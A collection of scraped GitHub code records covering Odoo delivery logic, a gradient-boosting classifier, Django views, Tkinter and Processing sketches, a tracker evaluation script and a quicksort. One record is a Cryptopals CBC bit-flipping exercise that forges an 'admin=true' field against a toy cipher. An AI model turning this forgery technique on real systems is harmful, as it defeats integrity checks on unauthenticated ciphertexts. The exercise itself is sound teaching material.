self.env[\"delivery_novaposhta.ttn\"]\n .with_context(autocreate=True)\n .create(data)\n )\n\n else:\n ttn = (\n self.env[\"delivery_novaposhta.ttn\"]\n .with_context(autocreate=True, notif=True)\n .create(data)\n )\n if ttn:\n if \"\" in self.np_payer_type.ref == \"Sender\":\n np_partner = self.env.ref(\"novaposhta_data.np_partner\")\n np_product = self.env.ref(\n \"novaposhta_data.product_product_delivery_np\"\n )\n if np_partner and np_product:\n invoice_data = {\n \"name\": \"\",\n \"move_type\": \"in_invoice\",\n \"partner_id\": np_partner.id,\n \"invoice_date\": fields.Datetime.now(),\n \"invoice_line_ids\": [\n (\n 0,\n 0,\n {\n \"name\": np_product.name,\n \"product_id\": np_product.id,\n \"quantity\": 1,\n \"product_uom_id\": np_product.uom_id.id,\n \"price_unit\": ttn.estimated_costs,\n \"analytic_account_id\": picking.sale_id.analytic_account_id.id,\n \"account_id\": np_partner.property_account_receivable_id.id,\n },\n )\n ],\n \"currency_id\": self.env.ref(\"base.UAH\").id,\n }\n picking.invoice_id = self.env[\"account.move\"].create(\n invoice_data\n )\n picking.ttn = ttn\n res = []\n cost = ttn.estimated_costs\n shipping_data = {\"exact_price\": cost, \"tracking_number\": ttn.doc_number}\n res += [shipping_data]\n else:\n shipping_data = {\n \"exact_price\": 101.0,\n \"tracking_number\": 20450090830943,\n }\n res += [shipping_data]\n return res\n","repo_name":"BorovlevAS/muztorg","sub_path":"biko_np_patch/models/delivery_carrier.py","file_name":"delivery_carrier.py","file_ext":"py","file_size_in_byte":6815,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27171685943","text":"# -*- coding: utf-8 -*-\r\nfrom data import *\r\nfrom CART_regression_tree import *\r\nimport numpy as np\r\nimport random\r\n\r\nclass GBDT:\r\n\tdef __init__(self):\r\n\t\tself.maxIter = 3\r\n\t\tself.maxDepth = 10\r\n\t\tself.treesList = None\r\n\r\n\tdef initialize(self, data, idSet, Type):\r\n\t\tif Type == 'multi_classification':\r\n\t\t\t#初始化f, p, residual, c, y\r\n\t\t\tself.treesList = []\r\n\t\t\tf = {}\r\n\t\t\tresidual = {}\r\n\t\t\ty = {}\r\n\t\t\tprob = {}\r\n\t\t\tc = {}\r\n\t\t\tfor k in range(0, data.K):\r\n\t\t\t\tf[k] = {}\r\n\t\t\t\tresidual[k] = {}\r\n\t\t\t\ty[k] = {}\r\n\t\t\t\tprob[k] = {}\r\n\t\t\t\tc[k] = {}\r\n\t\t\t\tfor Id in idSet:\r\n\t\t\t\t\tf[k][Id] = 0.\r\n\t\t\t\t\ty[k][Id] = 1. if data.getLabel(Id) == k else 0.\r\n\t\t\t\t\tc[k][Id] = 0.\r\n\t\t\tprob = self.caculate_prob_Multi(data, idSet, f, prob)\r\n\t\t\tresidual = self.caculate_residual_Multi(data, idSet, prob, y, residual)\r\n\t\t\treturn f, residual, y, prob, c\r\n\t\telif Type == 'binary_classification':\r\n\t\t\t#初始化y, f, residual, c\r\n\t\t\tself.treesList = []\r\n\t\t\tf = {}\r\n\t\t\tresidual = {}\r\n\t\t\tc = {}\r\n\t\t\ty = {}\r\n\t\t\tfor Id in idSet:\r\n\t\t\t\tf[Id] = 0.\r\n\t\t\t\tc[Id] = 0.\r\n\t\t\t\tif data.getLabel(Id)%2 == 0:\r\n\t\t\t\t\t#偶数为正类,奇数为负类\r\n\t\t\t\t\ty[Id] = 1\r\n\t\t\t\telse:\r\n\t\t\t\t\ty[Id] = -1\r\n\t\t\tresidual = self.caculate_residual_Binary(idSet, y, f, residual)\r\n\t\t\treturn f, residual, c, y\r\n\r\n\t\telif Type == 'regression':\r\n\t\t\t#初始化y, residual, c\r\n\t\t\tpass\r\n\t\telse:\r\n\t\t\tprint('输出参数有误')\r\n\t\t\treturn\r\n\t#以下区域计算binary的更新函数\r\n\tdef caculate_residual_Binary(self, idSet, y, f, residual):\r\n\t\tfor Id in idSet:\r\n\t\t\tresidual[Id] = y[Id]/(1. + np.exp(y[Id]*f[Id]))\r\n\t\treturn residual\r\n\r\n\tdef caculate_c_Binary(self, leafList, residual, c):\r\n\t\tfor node in leafList:\r\n\t\t\tfor Id in node.idSet:\r\n\t\t\t\tc[Id] = node.predictValue\r\n\t\treturn c\r\n\r\n\tdef update_f_Binary(self, idSet, c, f):\r\n\t\tfor Id in idSet:\r\n\t\t\tf[Id] += c[Id]\r\n\t\treturn f\r\n\r\n\tdef binary_classification(self, data, idSet):\r\n\t\tf, residual, c, y= self.initialize(data, idSet, 'binary_classification')\r\n\t\tt = 0\r\n\t\tfeatSet = data.featSet\r\n\t\tdepth = self.maxDepth\r\n\t\twhile True:\r\n\t\t\tif t >= self.maxIter:\r\n\t\t\t\tprint('到达迭代次数上限终止')\r\n\t\t\t\treturn\r\n\t\t\tprint('******************************************************************现在开始建立第' + str(t) + '棵树')\r\n\t\t\ttree = CART()\r\n\t\t\ttree.root = tree.constructTree(data, idSet, featSet, depth, residual, Type = 'binary_classification')\r\n\t\t\tself.treesList.append(tree)\r\n\t\t\tc = self.caculate_c_Binary(tree.leafList, residual, c)\r\n\t\t\tf = self.update_f_Binary(idSet, c, f)\r\n\t\t\tresidual = self.caculate_residual_Binary(idSet, y, f, residual)\r\n\t\t\tself.precision_binary(idSet, f, y)\r\n\t\t\tt += 1\r\n\r\n\tdef precision_binary(self, idSet, f, y):\r\n\t\tcount = 0.\r\n\t\tfor Id in idSet:\r\n\t\t\tif f[Id]*y[Id] > 0:\r\n\t\t\t\tcount += 1\r\n\t\tprint('**********************************************************本次预测准确率为:' + str(round(count/len(idSet)*100, 2)) + '%')\r\n\t#以下区域计算multi_classification的更新和预测\r\n\tdef caculate_prob_Multi(self, data, idSet, f, prob):\r\n\t\tfor Id in idSet:\r\n\t\t\tsums = 0.\r\n\t\t\tmaxK = 0\r\n\t\t\tfor k in range(0, data.K):\r\n\t\t\t\tif f[k][Id] > f[maxK][Id]:\r\n\t\t\t\t\tmaxK = k\r\n\t\t\tfor k in range(0, data.K):\r\n\t\t\t\tsums += np.exp(f[k][Id] - f[maxK][Id])\r\n\t\t\tfor k in range(0, data.K):\r\n\t\t\t\tprob[k][Id] = np.exp(f[k][Id] - f[maxK][Id])/sums\r\n\t\treturn prob\r\n\tdef caculate_residual_Multi(self, data, idSet, prob, y, residual):\r\n\t\tfor Id in idSet:\r\n\t\t\tfor k in range(0, data.K):\r\n\t\t\t\tresidual[k][Id] = y[k][Id] - prob[k][Id]\r\n\t\treturn residual\r\n\r\n\tdef caculate_c_Multi(self, leafList, c, k):\r\n\t\tfor node in leafList:\r\n\t\t\tfor Id in node.idSet:\r\n\t\t\t\tc[k][Id] = node.predictValue\r\n\t\treturn c\r\n\tdef update_f_Multi(self, data, idSet, f, c):\r\n\t\tfor k in range(0, data.K):\r\n\t\t\tfor Id in idSet:\r\n\t\t\t\tf[k][Id] += c[k][Id]\r\n\t\treturn f\r\n\tdef multi_classification(self, data, idSet):\r\n\t\tf, residual, y, prob, c = self.initialize(data, idSet, Type = 'multi_classification')\r\n\t\tt = 0\r\n\t\tdepth = self.maxDepth\r\n\t\tfeatSet = data.featSet\r\n\t\twhile True:\r\n\t\t\tif t >= self.maxIter:\r\n\t\t\t\tprint('到达迭代次数上限终止')\r\n\t\t\t\treturn\r\n\t\t\tprint('**************************************************************************************************************现在开始建立第' + str(t) + '棵树')\r\n\t\t\ttrees = {}\r\n\t\t\tfor k in range(0, data.K):\r\n\t\t\t\tprint('*******************************************************************现在开始建立第' + str(k) + '棵小树苗')\r\n\t\t\t\ttree = CART()\r\n\t\t\t\ttree.root = tree.constructTree(data, idSet, featSet, depth, residual[k], Type = 'multi_classification')\r\n\t\t\t\ttrees[k] = tree\r\n\t\t\t\tc = self.caculate_c_Multi(tree.leafList, c, k)\r\n\t\t\tself.treesList.append(trees)\r\n\t\t\tf = self.update_f_Multi(data, idSet, f, c)\r\n\t\t\tprob = self.caculate_prob_Multi(data, idSet, f, prob)\r\n\t\t\tresidual = self.caculate_residual_Multi(data, idSet, prob, y, residual)\r\n\t\t\tself.precision_Multi(data, idSet, f)\r\n\r\n\t\t\tt += 1\r\n\r\n\tdef precision_Multi(self, data, idSet, f):\r\n\t\tcount = 0.\r\n\t\tfor Id in idSet:\r\n\t\t\tpredictLabel = 0.\r\n\t\t\tfor k in range(0, data.K):\r\n\t\t\t\tif f[k][Id] > f[predictLabel][Id]:\r\n\t\t\t\t\tpredictLabel = k\r\n\t\t\tif predictLabel == data.getLabel(Id):\r\n\t\t\t\tcount += 1\r\n\t\t\telse:\r\n\t\t\t\tprint('样本' + str(Id) + '真实的label为:' + str(data.getLabel(Id)) + ' ' + '错误估计为:' + str(predictLabel))\r\n\t\tprint('******************************************************************************************************************本次预测准确率为:' + str(round(count/len(idSet)*100, 2)) + '%')\r\n\r\n\tdef getPredict_Multi(self, data, Id):\r\n\t\tscore = {}\r\n\t\tfor trees in self.treesList:\r\n\t\t\tfor k in range(0, data.K):\r\n\t\t\t\tscore[k] = score.get(k, 0) + trees[k].getPredict(data, Id, trees[k].root)\r\n\t\tbestK = 0\r\n\t\tfor k in range(0, data.K):\r\n\t\t\tif score[k] > score[bestK]:\r\n\t\t\t\tbestK = k\r\n\t\treturn bestK\r\n\r\n\tdef precisionTest(self, data, idSetTest):\r\n\t\tcount = 1.\r\n\t\tfor Id in idSetTest:\r\n\t\t\tif self.getPredict_Multi(data, Id) == data.getLabel(Id):\r\n\t\t\t\tcount += 1\r\n\t\tprint('***********************************************************************************************************************测试集上的准确率为:' + str(round(count/len(idSetTest)*100, 2)) + '%')\r\n\r\nmodel = GBDT()\r\ndata = Data()\r\nidSet = random.sample(range(0, 50000), 2000)\r\nmodel.multi_classification(data, idSet)\r\nidSetTest = random.sample(range(0, 50000), 200)\r\nmodel.precisionTest(data, idSetTest)\r\n\r\n\r\n\t\t\r\n\r\n","repo_name":"ashu233/GBDT","sub_path":"GBDT.py","file_name":"GBDT.py","file_ext":"py","file_size_in_byte":6320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9244998704","text":"print('AAACCCCCC')\n\nmy_list=[10,20,30,10,[10,56,89,75,10,56,10],56,10,89,48]\nx=1\nprint('adadassdfdsssssssssss')\nfor num in my_list:\n if num==10:\n my_list.remove(num)\n elif x==1:\n print(\"vishnu\")\n elif type(num) == list:\n print(\"vikrant\")\n TenCount = num.count(10)\n print(TenCount)\n for item in range(TenCount):\n num.remove(10)\nprint(my_list)\n\n# C:\\Users\\Admin\\PycharmProjects\\Demo\\11_04_19_ListTypes_List_Tuple_Set_Dict_Methods.py\n'''\nmy_list=[10,20,30,10,[10,56],56,10,89,48]\nmy_list1=[]\nfor num in my_list:\n if num != 10:\n my_list1.append(num)\n elif type(num) == list:\n print(\"vikrant\")\n for item in num:\n if item == 10:\n num.remove(item)\n print(num)\n my_list1.append(num)\n #print(TenCount)\n\nprint(my_list1)\n\nlistOfItems1=[10,10,30,[10,0,20],10,58,10,10]\n\nfor outerItem in listOfItems1:\n if type(outerItem)==list:\n innerList = outerItem\n for innerItem in innerList:\n if innerItem==10:\n innerList.remove(innerItem)\n elif outerItem==10:\n listOfItems1.remove(outerItem)\nprint(listOfItems1)\n\n\n\n'''\n\n","repo_name":"Vishnuworld/Demo","sub_path":"New folder/AAAAA.py","file_name":"AAAAA.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73724569448","text":"from django.contrib import messages\nfrom django.shortcuts import redirect, render\nfrom filme.models import Filme\n\nfrom .forms import *\nfrom .models import *\n\n\ndef addComentario(request, movie_id):\n if request.user.is_authenticated:\n movie = Filme.objects.get(pk=movie_id)\n \n if request.method == 'POST':\n form = ComentarioForm(request.POST or None)\n \n if form.is_valid():\n data = form.save(commit=False)\n data.comentario = request.POST['comentario']\n data.nota = request.POST['nota']\n data.user = request.user\n data.filme = movie\n data.save()\n \n if len(data.comentario) < 5:\n messages.add_message(\n request,\n messages.ERROR,\n f\"Comentário NÃO foi adicionado. O comentário deve ter no mínimo 5 caracteres.\"\n )\n return redirect('filmes:detail', movie_id) \n \n messages.add_message(\n request,\n messages.SUCCESS,\n f\"Comentário enviado com sucesso.\"\n )\n return redirect('filmes:detail', movie_id)\n else:\n messages.add_message(\n request,\n messages.ERROR,\n f\"Comentário NÃO foi adicionado.\"\n )\n return redirect('filmes:detail', movie_id)\n else:\n form = ComentarioForm()\n \n context = {'form': form}\n return render(request, 'filme/filme_detalhes.html', context)\n else:\n return redirect('perfil:login') \n\n\ndef editComentario(request, movie_id, comentario_id):\n if request.user.is_authenticated:\n try:\n user_comentario = Comentario.objects.get(filme=movie_id, pk=comentario_id)\n except:\n return render(request, 'comentario/erro.html')\n \n if request.user == user_comentario.user:\n if request.method == 'POST':\n form = ComentarioForm(request.POST or None, instance=user_comentario)\n \n if form.is_valid():\n data = form.save(commit=False)\n \n if (data.nota > 10) or (data.nota < 0):\n error = 'Valor de nota inválido. Favor escolher entre 0 e 10.'\n context = {\n 'error': error,\n 'form': form\n }\n messages.add_message(\n request,\n messages.ERROR,\n f\"Não foi possível salvar o comentário editado.\"\n )\n return render(request, 'comentario/editComentario.html', context)\n else:\n data.save()\n messages.add_message(\n request,\n messages.SUCCESS,\n f\"Comentáro foi editado com sucesso.\"\n )\n return redirect('filmes:detail', movie_id) \n else:\n form = ComentarioForm(instance=user_comentario)\n \n context = {'form': form}\n return render(request, 'comentario/editComentario.html', context)\n else:\n return redirect('filmes:detail', movie_id)\n else: \n return redirect('perfil:login')\n \n\ndef deleteComentario(request, movie_id, comentario_id):\n if request.user.is_authenticated:\n try:\n comentario = Comentario.objects.get(filme=movie_id, pk=comentario_id)\n except:\n return render(request, 'comentario/erro.html')\n \n if request.user == comentario.user:\n comentario.delete()\n messages.add_message(\n request,\n messages.SUCCESS,\n f\"Comentáro foi excluído com sucesso.\"\n )\n else:\n return redirect('filmes:detail', movie_id)\n return redirect('filmes:detail', movie_id)\n","repo_name":"EduardoBran/EbFilmes-App-Web-Py","sub_path":"comentario/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4341,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36992060829","text":"from tkinter import *\n\n#initializing Tk class OOP(Object-Oriented Programming)\nroot = Tk()\n\n\n#Entry(root) = shows an input field which allows users to enter data\n#We can change its colour and size or features of the input field as the button eg: fg, bg, width, etc\n#.insert(index value, text) = giving a default text/ value into the input field\nentryWid = Entry(root, width = 50, borderwidth = 5)\nentryWid.pack()\nentryWid.insert(0, \"Enter Your Name: \")\n\n#We are able to put variables into the text section\n#.get() allows us to get the input from the user entry widget\ndef myClick():\n myLabel = Label(root, text = f\"Hello, {entryWid.get()}\")\n myLabel.pack()\n\n#Button(root, text) = having a button for user to click\n#state = DISABLED = wont allow user to click the button, but it'll still show the button\n#padx = num = controlling the x-axis(width size) of the button\n#pady = num = controlling the y-axis(length size) of the button\n#command = func = letting the button to do something\n#fg = \"colour\" = changing the text colour\n#bg = \"colour\" = changing the button background color\nmyButton = Button(root, text = \"Enter you name\", padx = 50, pady = 50, fg = \"Blue\", bg = \"light green\", command = myClick)\nmyButton.pack()\n\n#Tkinter loop func\nroot.mainloop()","repo_name":"cheokjw/Pytkinter-study","sub_path":"tkinter/Codes/tk entrywid.py","file_name":"tk entrywid.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30837346253","text":"import time\n\nlastX = 0\nlastY = 0\nsquareSize = 2\nsizeIncrementBy = 5\nrotDeg = 0 #in degrees\ndegIncrementBy = 4\ntableDiam = 400\ntableRadius = tableDiam/2\nscreenSize = tableDiam+50\ncenterScreen = screenSize/2\nendProgram = False\niterations = 45\nstate=0\nxys = [(0,0)]\ntest = []\ndef setup():\n size(screenSize*2, screenSize)\n # colorMode(HSB, width, 100, width)\n noStroke()\n background(0)\n \n global test\n test = importGcode(\"helloworld.gcode\") #starTest.gcode #simpleSquareThing\n\ndef draw():\n global state\n if(state==0):\n drawTable()\n state+=1\n elif(state==1):\n global squareSize\n global rotDeg\n global iterations\n # line (100,100,200,200)\n # pushMatrix()\n translate(centerScreen,centerScreen) #Go to Center of Screen\n drawBrokenSquare(squareSize)\n # drawBrokenSquare(65)\n # popMatrix()\n squareSize+=sizeIncrementBy\n rotDeg += degIncrementBy\n # time.sleep(.2)\n iterations-=1\n if(iterations==0):\n state+=1\n iterations = 0\n print(xys)\n elif(state == 2):\n translate(centerScreen*2,0)\n drawTable()\n state+=1\n elif(state ==3):\n if( (test[iterations][0] == \"G09\") ):\n # print(\"HELLOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO\")\n # iterations+=1\n pass\n else:\n translate(centerScreen*2+25,25)\n # translate(centerScreen*3,centerScreen)\n # line(xys[iterations][0],xys[iterations][1],xys[iterations+1][0],xys[iterations+1][1])\n line(test[iterations][1],test[iterations][2],test[iterations+1][1],test[iterations+1][2])\n # iterations+=1\n # if iterations+1>=len(xys):\n iterations +=1\n if iterations+1>=len(test):\n state+=1\n # time.sleep(.3)\n\ndef importGcode(fileName):\n f = open(fileName, 'r')\n list = []\n for line in f:\n parts = line.split()\n if len(parts) == 3:\n if parts[0] == \"G01\" or parts[0] == \"G00\":\n x = float(parts[1][1:])\n y = float(parts[2][1:])\n \n # print(parts[1][1:],parts[2][1:])\n list.append((parts[0],x,y))\n elif parts[0] == \"G7 \":\n list.append( (9999,9999) )\n # print(list)\n return list\n\ndef drawTable():\n stroke(255)\n noFill()\n ellipse(centerScreen,centerScreen,tableDiam,tableDiam)\ndef RotatePoint(x,y,deg):\n theta = radians(deg)\n newX = x*cos(theta)-y*sin(theta)\n newY = x*sin(theta)+y*cos(theta)\n return newX,newY\n\ndef drawBrokenSquare(sideLength):\n global lastX\n global lastY\n global endProgram\n cSize = 5\n outOfBoundsCount=0\n xCoords = (1,1,-1,-1)\n yCoords = (1,-1,-1,1)\n # stroke(255) #lets go white\n stroke(204, 102, 0) #orange you glad\n for i in range(4):\n # print(lastX,lastY,xCoords[i]*sideLength,yCoords[i]*sideLength)\n newX = xCoords[i]*sideLength\n newY = yCoords[i]*sideLength\n newX, newY = RotatePoint(newX,newY,rotDeg)\n \n # #if outside circle\n # r = sqrt(newX**2+newY**2)\n # if r > tableRadius:\n # # endProgram = True\n # # theta = atan(newY/newX)\n # outOfBoundsCount+=1\n # if outOfBoundsCount==4:\n # endProgram=True\n \n if i==3:\n newY+=sizeIncrementBy\n line(lastX,lastY,newX,newY)\n xys.append((newX,newY))\n # ellipse(newX,newY,cSize,cSize) #draw each Point\n lastX = newX\n lastY = newY\n # time.sleep(1)\n\n \n","repo_name":"shalmi/SandTable","sub_path":"Processing/designMaker/designMaker.pyde","file_name":"designMaker.pyde","file_ext":"pyde","file_size_in_byte":3633,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23278182588","text":"from django.http import JsonResponse\nfrom .models import Drinks, Products\nfrom .serializer import DrinkSerializer, ProdcutsSerializer\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\n\n@api_view(['GET', 'POST'])\ndef drink_list(request,format=None):\n if request.method == 'GET':\n drinks = Drinks.objects.all()\n serializer = DrinkSerializer(drinks, many=True)\n return JsonResponse(serializer.data, safe=False)\n\n if request.method == 'POST':\n serializer = DrinkSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\n@api_view([\"GET\", \"POST\"])\ndef product(request,format=None):\n if request.method == \"GET\":\n products = Products.objects.all()\n productsserializer = ProdcutsSerializer(products, many=True)\n return JsonResponse(productsserializer.data, safe=False)\n\n if request.method == \"POST\":\n products_serializer = ProdcutsSerializer(data=request.data)\n if products_serializer.is_valid():\n products_serializer.save()\n return Response(products_serializer.data, status=status.HTTP_201_CREATED)\n else:\n return Response({\"error_msg\":\"not a valid param passed\"},status=status.HTTP_204_NO_CONTENT)\n\n\n@api_view([\"GET\",\"PUT\",\"DELETE\"])\ndef product_details(request,id,format=None):\n try:\n products=Products.objects.get(pk=id)\n except Products.DoesNotExist:\n return Response({\"msg\":\"product not found\"},status=status.HTTP_404_NOT_FOUND)\n\n if request.method == 'GET':\n product_serializer= ProdcutsSerializer(products)\n return Response(product_serializer.data)\n\n elif request.method == \"PUT\":\n product_serializer= ProdcutsSerializer(products, request.data)\n if product_serializer.is_valid():\n product_serializer.save()\n return Response(product_serializer.data, status=status.HTTP_201_CREATED)\n return Response(product_serializer.errors,status=status.HTTP_400_BAD_REQUEST)\n\n elif request.method == 'DELETE':\n products.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\n\n\n","repo_name":"nitish0565/DjangoEcartProject","sub_path":"ecom/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29129634722","text":"from os.path import basename, splitext\nimport numpy as np\nimport glob\nimport math\nimport matplotlib.pyplot as plt\n\n\ndef isNAN(bbox):\n for value in bbox.flatten():\n if math.isnan(value):\n return True\n\ndef interval_overlap(interval_a, interval_b):\n x1, x2 = interval_a\n x3, x4 = interval_b\n\n if x3 < x1:\n if x4 < x1:\n return 0\n else:\n return min(x2,x4) - x1\n else:\n if x2 < x3:\n return 0\n else:\n return min(x2,x4) - x3 \n\ndef bbox_iou(box1, box2):\n \"\"\" Compute IOU between two bboxes in the form [x1,y1,w,h]\n \"\"\"\n x1_min = box1[0]\n x1_max = x1_min + box1[2]\n y1_min = box1[1]\n y1_max = y1_min + box1[3]\n\n x2_min = box2[0]\n x2_max = x2_min + box2[2]\n y2_min = box2[1]\n y2_max = y2_min + box2[3]\n\n intersect_w = interval_overlap([x1_min, x1_max], [x2_min, x2_max])\n intersect_h = interval_overlap([y1_min, y1_max], [y2_min, y2_max])\n \n intersect = intersect_w * intersect_h\n \n union = box1[2] * box1[3] + box2[2] * box2[3] - intersect\n \n return float(intersect) / union\n\ndef average_IOU(annots, outputs):\n nb_video = len(annots)\n total_frames = 0\n total_avg_iou = 0.0\n total_avg_lost = 0.0\n for i, annot in enumerate(annots):\n if basename(annot)[:-4] != basename(outputs[i])[:-4]:\n print(\"Annotations:\", annot)\n print(\"Output:\", outputs)\n raise ValueError(\"Wrong annotation and track correspondence.\")\n\n print(\"Evaluating %s.\" % basename(annot))\n\n labels = np.loadtxt(annot, delimiter=',')\n mot_results = np.loadtxt(outputs[i], delimiter=',')\n\n nb_frame = len(labels)\n total_frames += nb_frame\n\n avg_iou = 0.0\n avg_lost = 0.0\n for fi, label in enumerate(labels):\n if fi == 0:\n # Tracking start\n continue\n\n if isNAN(labels[fi]) is True:\n # No target in the frame\n continue\n\n index_list = np.argwhere(mot_results[:, 0] == (fi+1))\n\n if index_list.shape[0] != 0:\n max_iou = 0.0\n for index in index_list[:, 0]:\n bbox = mot_results[index, 2:6]\n iou = bbox_iou(bbox, label)\n if iou > max_iou:\n max_iou = iou\n avg_iou += max_iou\n\n if max_iou == 0.0:\n avg_lost += 1\n else:\n # print(\"Lost frame:\", fi+1)\n avg_lost += 1\n\n print(\"\\tLost target = {} / {}\".format(int(avg_lost), nb_frame - 1))\n\n avg_iou /= (nb_frame - 1)\n avg_lost /= (nb_frame - 1)\n\n print(\"\\tAverage IOU = {:.2f}%\".format(avg_iou * 100))\n print(\"\\tNumber of frames = {}\".format(nb_frame))\n\n total_avg_iou += avg_iou\n total_avg_lost += avg_lost\n\n print(\"==================================================\")\n \n total_avg_iou /= nb_video\n total_avg_lost /= nb_video\n\n print(\"Total frames: {}\".format(total_frames))\n print(\"==================================================\")\n \n return total_avg_iou, total_avg_lost\n\ndef overlap_precision(annots, outputs, threshold):\n nb_video = len(annots)\n total_precision = 0.0\n for i, annot in enumerate(annots):\n if basename(annot)[:-4] != basename(outputs[i])[:-4]:\n raise ValueError(\"Wrong annotation and track correspondence.\")\n\n labels = np.loadtxt(annot, delimiter=',')\n mot_results = np.loadtxt(outputs[i], delimiter=',')\n\n nb_frame = len(labels)\n\n precision = 0.0\n\n for fi, label in enumerate(labels):\n if fi == 0:\n # Tracking start\n continue\n\n if isNAN(labels[fi]) is True:\n # No target in the frame\n continue\n\n index_list = np.argwhere(mot_results[:, 0] == (fi+1))\n\n if index_list.shape[0] != 0:\n max_iou = 0.0\n for index in index_list[:, 0]:\n bbox = mot_results[index, 2:6]\n iou = bbox_iou(bbox, label)\n if iou > max_iou:\n max_iou = iou\n if max_iou > threshold:\n precision += 1\n\n precision /= (nb_frame - 1)\n\n total_precision += precision\n \n total_precision /= nb_video\n \n return total_precision\n\n\ndef success_plot_auc(ann, tra, det=None):\n fig = plt.figure(\"Success plot\")\n t = np.linspace(0.0, 1.0, 30)\n s = np.zeros_like(t)\n for i, threshold in enumerate(t):\n s[i] = overlap_precision(ann, tra, threshold) * 100\n plt.plot(t, s)\n auc_score = np.mean(s)\n\n if det is not None:\n det_s = np.zeros_like(t)\n for i, threshold in enumerate(t):\n det_s[i] = overlap_precision(ann, det, threshold) * 100\n plt.plot(t, det_s)\n det_auc_score = np.mean(det_s)\n plt.legend(('YOLO+SORT [{:.1f}]'.format(auc_score), 'YOLO [{:.1f}]'.format(det_auc_score)), loc='upper right')\n else:\n plt.legend(('YOLO+SORT [{:.1f}]'.format(auc_score), ''), loc='upper right')\n\n plt.xlabel('Overlap threshold (IOU)')\n plt.ylabel('Overlap precision[%]')\n plt.title('UAV123, Person only')\n plt.grid(True)\n\n plt.savefig('YOLO_SORT.png')\n plt.show()\n\n","repo_name":"humoncy/my_tracker","sub_path":"sort/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":5399,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8620687316","text":"from c10 import cbc_cipher\r\n\r\nclass admin_cipher(cbc_cipher):\r\n def encrypt_data(self, data):\r\n if type(data) == str:\r\n data = data.encode()\r\n assert (b';' not in data and b'=' not in data), \"Not allowed\"\r\n pre = b'comment1=cooking%20MCs;userdata='\r\n post = b';comment2=%20like%20a%20pound%20of%20bacon'\r\n return self.encrypt(pre + data + post)\r\n\r\n def decrypt_data(self, data):\r\n data = ''.join([chr(i) for i in self.decrypt(data)])\r\n datadict = {prop.split('=')[0]: prop.split('=')[1] for prop in data.split(';')}\r\n\r\n #return datadict.pop('admin', False)\r\n return datadict # Nicer than just returning True/False\r\n\r\n# To do: generalize byte flipping method into a function\r\n\r\ndef main():\r\n cph = admin_cipher()\r\n # Calculate input prepend length needed for our stuff to start at a new block\r\n prep_len = len('comment1=cooking%20MCs;userdata=')\r\n input_prep_len = (16 - (prep_len % 16)) % 16\r\n input_prep = input_prep_len * b'X'\r\n # The \\x00's will be flipped to become ; and = resp.\r\n input = input_prep + b'XXXXX\\x00admin\\x00true'\r\n # Positions of the semicolon and equal symbol\r\n sc_idx = prep_len + input_prep_len + 5\r\n eq_idx = prep_len + input_prep_len + 11\r\n # Flipping a byte in block i will scramble block i and flip a byte in block i+1,\r\n # so in order to not scramble the prepended data we add another full block\r\n # before the input. (Now the block that will be scrambled is just userdata)\r\n output = cph.encrypt_data(16 * b'X' + input)\r\n # Flip relevant bytes\r\n sc_flip = bytes([output[sc_idx] ^ ord(';')])\r\n eq_flip = bytes([output[eq_idx] ^ ord('=')])\r\n output = output[:sc_idx] + sc_flip + output[sc_idx+1:eq_idx] + eq_flip + output[eq_idx+1:]\r\n print(cph.decrypt_data(output))\r\n","repo_name":"nearestneighbour/cryptochallenge","sub_path":"set2/c16.py","file_name":"c16.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74604696487","text":"class Solution:\n def exist(self, board, word: str) -> bool:\n \"\"\"\n Backtracking\n \"\"\"\n rows, cols = len(board), len(board[0])\n visited = set()\n\n def dfs(row, col, current_idx): \n if current_idx == len(word):\n return True\n\n if row<0 or col<0 or row>=rows or col>=cols or board[row][col] != word[current_idx] or (row, col) in visited: \n return False\n\n visited.add((row, col)) # in this iteration of backtrack, we won't need to visited this cell again\n\n # call dfs on each neighbor of current cell\n res = dfs(row+1, col, current_idx+1) or dfs(row-1, col, current_idx+1) or dfs(row, col+1, current_idx+1) or dfs(row, col-1, current_idx+1)\n \n visited.remove((row, col)) # So that this does obstruct other dfs calls\n \n return res\n\n\n for row in range(rows):\n for col in range(cols):\n res = dfs(row, col, 0)\n if res:\n return True\n return False","repo_name":"azmainamin/leetcode","sub_path":"WordSearch.py","file_name":"WordSearch.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71400051048","text":"import random\r\n\r\ndef rand_list(n, m=1000):\r\n array = [random.randint(1, m) for num in range(n)]\r\n return array\r\n\r\ndef quick_sort(array):\r\n if len(array) < 2:\r\n return array\r\n else:\r\n low, selected, high = [], [], []\r\n pivot = array[random.randint(1, len(array)-1)]\r\n\r\n for item in array:\r\n if item < pivot:\r\n low.append(item)\r\n elif item == pivot:\r\n selected.append(item)\r\n elif item > pivot:\r\n high.append(item)\r\n return quick_sort(low) + selected + quick_sort(high)\r\n\r\nprint(quick_sort(rand_list(10)))\r\n","repo_name":"istvan-takacs/projects","sub_path":"sorting 